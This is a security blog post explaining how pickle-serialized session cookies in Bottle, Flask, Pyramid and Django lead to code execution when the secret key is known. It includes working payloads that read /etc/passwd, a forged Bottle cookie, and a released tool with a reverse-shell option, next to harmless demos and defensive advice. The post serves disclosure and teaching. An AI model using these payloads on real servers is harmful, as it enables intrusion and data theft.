Balda's place

Python web frameworks and pickles

Published on 23 June 2013


TL;DR: the tool is available here: pppp.tar.gz

During the talk Shenril and I gave at Nuit du Hack, I spoke about ways to exploit various Python web frameworks that use pickle as a data serializer. In this post, I'll try to present as much information as I can about how this happens and how to exploit it.

Let's get back to the basics:

Pickle

Pickle is a Python module used to serialize data but, contrary to JSON or YAML, it can serialize arbitrary objects and not just plain data. In most cases this is not a problem, but an object can define a __reduce__() method that returns a callable and its arguments. __reduce__() itself runs when the object is pickled; the callable it returned is then invoked when the data is unpickled, which is how code ends up being executed.

import pickle
import subprocess

class test(object):
    def __reduce__(self):
        return (subprocess.check_output, (('cat','/etc/passwd'),))

a = pickle.dumps(test())
print a
"csubprocess\ncheck_output\np0\n((S'cat'\np1\nS'/etc/passwd'\np2\ntp3\ntp4\nRp5\n."
b = pickle.loads(a)
print b
'root:x:0:0:root:/root:/bin/bash\n[...]'

Printing the result of pickle.dumps() shows the pickled object, but it is also possible to see how pickle's internal VM treats each instruction with the pickletools.dis() function:

>>> import pickletools
>>> pickletools.dis(a)
    0:  c    GLOBAL     'subprocess check_output'
    25: p    PUT        0
    28: (    MARK
    29: (        MARK
    30: S            STRING     'cat'
    37: p            PUT        1
    40: S            STRING     '/etc/passwd'
    55: p            PUT        2
    58: t            TUPLE      (MARK at 29)
    59: p        PUT        3
    62: t        TUPLE      (MARK at 28)
    63: p    PUT        4
    66: R    REDUCE
    67: p    PUT        5
    70: .    STOP
highest protocol among opcodes = 0

I won't go any further into pickle opcodes, as plenty of information about them is already available on the Internet.
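A harmless way to see when each piece runs is sketched here. It is written for Python 3 (the listings in this post are Python 2), and the Demo class and the calls list are illustrative names of mine. The built-in int stands in for subprocess.check_output, so nothing is executed on the system.

```python
import pickle
import pickletools

calls = []  # records every time __reduce__ runs (illustrative helper)


class Demo(object):
    def __reduce__(self):
        calls.append("reduce")
        # Harmless stand-in for subprocess.check_output: int("1337")
        return (int, ("1337",))


blob = pickle.dumps(Demo(), protocol=0)
calls_after_dump = list(calls)   # __reduce__ has already run at this point

result = pickle.loads(blob)      # calls int("1337"); Demo is not involved
calls_after_load = list(calls)   # unchanged: __reduce__ is not called again

# Opcode names, obtained by parsing the stream without executing it
opcodes = [op.name for op, arg, pos in pickletools.genops(blob)]
print(result, calls_after_load, opcodes)
```

The object that comes out of pickle.loads() is whatever the callable returned, not an instance of the original class, which is why the unpickling side does not need the class definition at all.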

Web frameworks and pickle

Several Python web frameworks provide a way to store session information in cookies that are sent back to the user. Generally, these cookies contain a pickled representation of a list or a dictionary of values stored in the user session. For instance, let's create a small application with the Bottle framework:

from bottle import route, run, response, request, HTTPResponse

@route('/')
def main():
    value = request.get_cookie('account', secret='SecretK3y')
    if value:
        return value

@route('/set')
def set():
    resp = HTTPResponse(status=303)
    resp.set_header('Location','/')
    resp.set_cookie('account', 'Admin', secret='SecretK3y')
    return resp

run(host='127.0.0.1', port=8080, debug=True, reloader=True)

This simple application sets a cookie when the user visits the /set route and displays the cookie's value when they visit /.

When the /set URL is accessed, the server responds with the following header:

Set-Cookie: account="!Xgen4B8bNpwWRNltHcfaZQ==?gAJVB2FjY291bnRxAVUFQWRtaW5xAoZxAy4="

To see how this cookie is constructed by Bottle, let's check its source code:

#bottle.py
def cookie_encode(data, key):
    ''' Encode and sign a pickle-able object. Return a (byte) string '''
    msg = base64.b64encode(pickle.dumps(data, -1))
    sig = base64.b64encode(hmac.new(tob(key), msg).digest())
    return tob('!') + sig + tob('?') + msg

By decoding the last part of the cookie, we can see how the data is stored in it:

>>> import pickle
>>> pickle.loads('gAJVB2FjY291bnRxAVUFQWRtaW5xAoZxAy4='.decode('base64'))
('account', 'Admin')
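Since pickle.loads() is itself the dangerous call, a cookie of unknown origin is better disassembled than loaded. The following Python 3 sketch splits the cookie from the Set-Cookie header above and lists its opcodes with pickletools.genops(), which parses the stream without executing anything. The variable names are mine.

```python
import base64
import pickletools

cookie = "!Xgen4B8bNpwWRNltHcfaZQ==?gAJVB2FjY291bnRxAVUFQWRtaW5xAoZxAy4="

# Layout from cookie_encode(): '!' + base64(signature) + '?' + base64(pickle)
sig_b64, msg_b64 = cookie[1:].split("?", 1)
signature = base64.b64decode(sig_b64)
payload = base64.b64decode(msg_b64)

# genops() only parses the opcode stream; no callable is ever invoked
ops = [(op.name, arg) for op, arg, pos in pickletools.genops(payload)]
strings = [arg for name, arg in ops if name == "SHORT_BINSTRING"]

print(len(signature))  # 16 bytes, the size of an MD5 digest
print(strings)         # ['account', 'Admin']
```

A 16-byte signature is consistent with hmac.new() being called without a digest argument, which meant MD5 in Python 2.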

So the cookie name and its value are stored in a tuple. Great! Now let's forge a cookie with the malicious pickle we created before:

import pickle, subprocess, base64, hmac

class test(object):
    def __reduce__(self):
        return (subprocess.check_output, (('cat','/etc/passwd'),))

p=pickle.dumps(('account',test()))
msg = base64.b64encode(p)
sig = base64.b64encode(hmac.new('SecretK3y', msg).digest())
print '!'+sig+'?'+msg
!IGOy9wZDbDQZU5onzz/5Bg==?KFMnYWNjb3VudCcKcDAKY3N1YnByb2Nlc3MKY2hlY2tfb3V0cHV0CnAxCigoUydjYXQnCnAyClMnL2V0Yy9wYXNzd2QnCnAzCnRwNAp0cDUKUnA2CnRwNwou

Now if we replace the cookie value with what we just generated and request the / page again, the page will output the content of the server's /etc/passwd file.
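The whole round trip can be reproduced offline with a harmless payload. This is a Python 3 sketch: cookie_encode() follows the Bottle excerpt above, with MD5 spelled out because it was the implicit default of hmac.new() in Python 2, while cookie_decode() is my assumption of what the verifying side looks like, not Bottle's actual code. The Harmless class is illustrative and calls int instead of a shell command.

```python
import base64
import hashlib
import hmac
import pickle


def cookie_encode(data, key):
    """Sign and encode a picklable object in the '!sig?msg' layout."""
    msg = base64.b64encode(pickle.dumps(data, -1))
    sig = base64.b64encode(hmac.new(key, msg, hashlib.md5).digest())
    return b"!" + sig + b"?" + msg


def cookie_decode(cookie, key):
    """Check the signature, then unpickle: the step the attack targets."""
    sig, msg = cookie[1:].split(b"?", 1)
    expected = base64.b64encode(hmac.new(key, msg, hashlib.md5).digest())
    if not hmac.compare_digest(sig, expected):
        return None  # wrong key or tampered cookie: nothing is unpickled
    return pickle.loads(base64.b64decode(msg))


class Harmless(object):
    def __reduce__(self):
        # Stand-in payload: the "server" will call int("1337")
        return (int, ("1337",))


KEY = b"SecretK3y"
forged = cookie_encode(("account", Harmless()), KEY)
accepted = cookie_decode(forged, KEY)
rejected = cookie_decode(forged, b"some-other-key")
print(accepted, rejected)
```

The signature check is the only barrier: with the right key the payload is unpickled and its callable runs, and with any other key the cookie is discarded before pickle is involved.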

Affected web frameworks

Bottle is not the only web framework that uses pickle as a data serializer. Nearly all of them support it. So far, I've successfully checked and exploited this vulnerability in the following frameworks:

  • Bottle, as we just saw
  • Werkzeug / Flask
  • Pylons / Pyramid
  • Django

Flask

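Nearly the same as Bottle. The cookie generation code lives in Werkzeug's SecureCookie class; the pickling itself happens in self.quote(), which is applied to each value: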

#contrib/securecookie.py
def serialize(self, expires=None):
    """Serialize the secure cookie into a string.

    If expires is provided, the session will be automatically invalidated
    after expiration when you unseralize it. This provides better
    protection against session cookie theft.

    :param expires: an optional expiration date for the cookie (a
                    :class:`datetime.datetime` object)
    """
    if self.secret_key is None:
        raise RuntimeError('no secret key defined')
    if expires:
        self['_expires'] = _date_to_unix(expires)
    result = []
    mac = hmac(self.secret_key, None, self.hash_method)
    for key, value in sorted(self.items()):
        result.append('%s=%s' % (
            url_quote_plus(key),
            self.quote(value)
        ))
        mac.update('|' + result[-1])
    return '%s?%s' % (
        mac.digest().encode('base64').strip(),
        '&'.join(result)
    )
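To make the resulting cookie layout easier to picture, here is a Python 3 approximation of the excerpt above. It is a sketch under assumptions: quote() is my simplified stand-in that pickles and base64-encodes each value, SHA-1 is assumed as the hash method, urllib's quote_plus replaces url_quote_plus, and the expiry handling is left out.

```python
import base64
import hashlib
import hmac
import pickle
from urllib.parse import quote_plus


def quote(value):
    """Simplified stand-in for SecureCookie.quote(): pickle, then base64."""
    return base64.b64encode(pickle.dumps(value)).decode("ascii")


def serialize(items, secret_key, hash_method=hashlib.sha1):
    """Build 'base64(mac)?key=value&key=value' as in the excerpt."""
    result = []
    mac = hmac.new(secret_key, None, hash_method)
    for key, value in sorted(items.items()):
        result.append("%s=%s" % (quote_plus(key), quote(value)))
        # Each 'key=value' pair is fed to the MAC, prefixed with '|'
        mac.update(b"|" + result[-1].encode("ascii"))
    return "%s?%s" % (
        base64.b64encode(mac.digest()).decode("ascii"),
        "&".join(result),
    )


cookie = serialize({"username": "Admin"}, b"not-a-real-key")
mac_part, _, body = cookie.partition("?")
name, _, value = body.partition("=")
print(mac_part, name, value)
```

Each value is an independent pickle, so a single forged key=value pair is enough once the MAC can be recomputed.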

Pyramid

Pyramid and Pylons are also affected:

#controllers/util.py
def signed_cookie(self, name, data, secret=None, **kwargs):
    """Save a signed cookie with secret signature

    Saves a signed cookie of the pickled data. All other keyword
    arguments that ``WebOb.set_cookie`` accepts are usable and
    passed to the WebOb set_cookie method after creating the signed
    cookie value.

    """
    pickled = pickle.dumps(data, pickle.HIGHEST_PROTOCOL)
    sig = hmac.new(secret, pickled, sha1).hexdigest()
    self.set_cookie(name, sig + base64.standard_b64encode(pickled), **kwargs)
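The format is slightly different from Bottle's: the signature is a hexadecimal SHA-1 HMAC computed over the raw pickle, immediately followed by the base64-encoded pickle with no separator. A minimal Python 3 sketch of that layout follows; sign() mirrors the excerpt, while split_signed() is a hypothetical helper of mine and not the framework's own decoding code.

```python
import base64
import hashlib
import hmac
import pickle


def sign(data, secret):
    """Build sig + base64(pickle), as signed_cookie() does before set_cookie()."""
    pickled = pickle.dumps(data, pickle.HIGHEST_PROTOCOL)
    sig = hmac.new(secret, pickled, hashlib.sha1).hexdigest()
    return sig + base64.standard_b64encode(pickled).decode("ascii")


def split_signed(value):
    """Hypothetical helper: separate the signature from the pickle."""
    # A SHA-1 hexdigest is always 40 characters long
    return value[:40], base64.standard_b64decode(value[40:])


SECRET = b"not-a-real-key"
cookie_value = sign({"user": "Admin"}, SECRET)
sig, pickled = split_signed(cookie_value)
valid = hmac.compare_digest(
    sig, hmac.new(SECRET, pickled, hashlib.sha1).hexdigest()
)
print(sig, valid)
```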

Django

Django is certainly the most interesting one, as it uses pickle with nearly all session management backends.

The faulty code is in contrib/sessions/backends/base.py, in the SessionBase class:

def encode(self, session_dict):
    "Returns the given session dictionary pickled and encoded as a string."
    pickled = pickle.dumps(session_dict, pickle.HIGHEST_PROTOCOL)
    hash = self._hash(pickled)
    return base64.b64encode(hash.encode() + b":" + pickled).decode('ascii')

And because all other backends are just subclasses of SessionBase, the problem propagates to all of them. I have only tested two at the moment, but the others should work as well:

  • django.contrib.sessions.backends.signed_cookies
  • django.contrib.sessions.backends.file

For instance, the file-based session backend stores the session as base64(hmac + ":" + pickle), as produced by the encode() method above, and by default writes the files to the temporary directory returned by tempfile.gettempdir(), which on UNIX systems usually points to /tmp.

If you also happen to find an arbitrary file upload on the same server, that's good news: it can be used to upload a session file, which is then unpickled to execute code.
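The stored format can be taken apart with a few lines. This Python 3 sketch mirrors the encode() excerpt, with a plain HMAC-SHA1 standing in for self._hash(), whose real implementation is not shown in this post; split_session() and the key are illustrative names of mine.

```python
import base64
import hashlib
import hmac
import pickle


def encode(session_dict, key):
    """Mirror of the encode() excerpt; HMAC-SHA1 stands in for self._hash()."""
    pickled = pickle.dumps(session_dict, pickle.HIGHEST_PROTOCOL)
    digest = hmac.new(key, pickled, hashlib.sha1).hexdigest()
    return base64.b64encode(digest.encode() + b":" + pickled).decode("ascii")


def split_session(session_data):
    """Undo the outer base64 and separate the hash from the pickle."""
    raw = base64.b64decode(session_data)
    # The hash is hexadecimal, so the first ':' is always the separator,
    # even if the pickle itself contains ':' bytes.
    digest, pickled = raw.split(b":", 1)
    return digest.decode("ascii"), pickled


KEY = b"not-a-real-key"
stored = encode({"user_id": 1}, KEY)
digest, pickled = split_session(stored)
print(digest, len(pickled))
```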

Secret key considerations

All of these attacks rely on knowing the secret key, which is normally protected by the framework, or at least hidden in the code. However, not all frameworks properly warn developers about this security problem.

In practice, a simple search on GitHub for hardcoded secret keys is self-explanatory.

Note that this does not guarantee that all of the applications found are vulnerable, but it shows that secret key management is not taken seriously.

Exploitation

As it is not that easy to generate a valid cookie or session file, I created a small script that generates valid malicious cookies for all of the aforementioned frameworks.

Its usage is really simple:

$ ./pppp.py -h
usage: pppp.py [-h] [-o {django_cookie,django_file,werkzeug,bottle,raw}]
               [-k SECRET_KEY] -p {connect_back,read_file,command_exec} -a
               ARGUMENT [-n VAR_NAME] [-m HASH_TYPE]

Generates harmful pickles for various uses (and fun)

optional arguments:
  -h, --help            show this help message and exit
  -o {django_cookie,django_file,werkzeug,bottle,raw}, --output {django_cookie,django_file,werkzeug,bottle,raw}
                        Pickle output format
  -k SECRET_KEY, --key SECRET_KEY
                        Application's secret key
  -p {connect_back,read_file,command_exec}, --payload {connect_back,read_file,command_exec}
                        Payload type
  -a ARGUMENT, --argument ARGUMENT
                        Payload's argument
  -n VAR_NAME, --name VAR_NAME
                        Var name for the pickled payload
  -m HASH_TYPE, --mac HASH_TYPE
                        (Werkzeug only) specify the hash type

For instance, to generate the malicious pickle in the Bottle example above, just type:

$ ./pppp.py -o bottle -k SecretK3y -p read_file -a /etc/passwd -n account
!OOdDHCo7esKUhSFX5Ivo4w==?KFMnYWNjb3VudCcKY3N1YnByb2Nlc3MKY2hlY2tfb3V0cHV0CigoUydjYXQnClMnL2V0Yy9wYXNzd2QnCmx0UnQu

Another, more telling example is the connect-back shell that can be spawned with the following command:

$ ./pppp.py -o bottle -k SecretK3y -p connect_back -a 127.0.0.1:31337 -n account

The generated pickle will, on execution, connect to 127.0.0.1 on port 31337 and spawn a /bin/sh bound to the socket.

PPPP is available right here: pppp.tar.gz

Conclusion

This attack cannot be used everywhere, but combined with other vulnerabilities such as a local file read, or with knowledge of the source code, it becomes possible to run arbitrary code on the server quite easily.

For application developers: be very careful with the secret key used in your application and don't publish it on GitHub, that's REALLY a bad idea. You can also change the serialization method, if your framework allows it, or use a file- or database-based session backend if you are sure that the session data cannot be manipulated.
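As an illustration of changing the serialization method, here is a minimal Python 3 sketch of a signed cookie that carries JSON instead of pickle. It is not taken from any of the frameworks above: the function names, the '!sig?msg' layout borrowed from the Bottle example and the choice of HMAC-SHA256 are all assumptions of mine.

```python
import base64
import hashlib
import hmac
import json


def json_cookie_encode(data, key):
    """Sign and encode JSON-serializable data as '!sig?msg'."""
    msg = base64.b64encode(json.dumps(data).encode("utf-8"))
    sig = base64.b64encode(hmac.new(key, msg, hashlib.sha256).digest())
    return b"!" + sig + b"?" + msg


def json_cookie_decode(cookie, key):
    """Return the decoded data, or None if the cookie is malformed or forged."""
    if not cookie.startswith(b"!") or b"?" not in cookie:
        return None
    sig, msg = cookie[1:].split(b"?", 1)
    expected = base64.b64encode(hmac.new(key, msg, hashlib.sha256).digest())
    if not hmac.compare_digest(sig, expected):
        return None
    # json.loads() only builds plain data types; it never calls a callable
    return json.loads(base64.b64decode(msg).decode("utf-8"))


KEY = b"not-a-real-key"
cookie = json_cookie_encode(["account", "Admin"], KEY)
decoded = json_cookie_decode(cookie, KEY)
forged = json_cookie_decode(cookie, b"guessed-key")
print(decoded, forged)
```

With this format a leaked key still lets an attacker forge session values, but it no longer turns into code execution, since the decoder can only produce strings, numbers, lists and dictionaries.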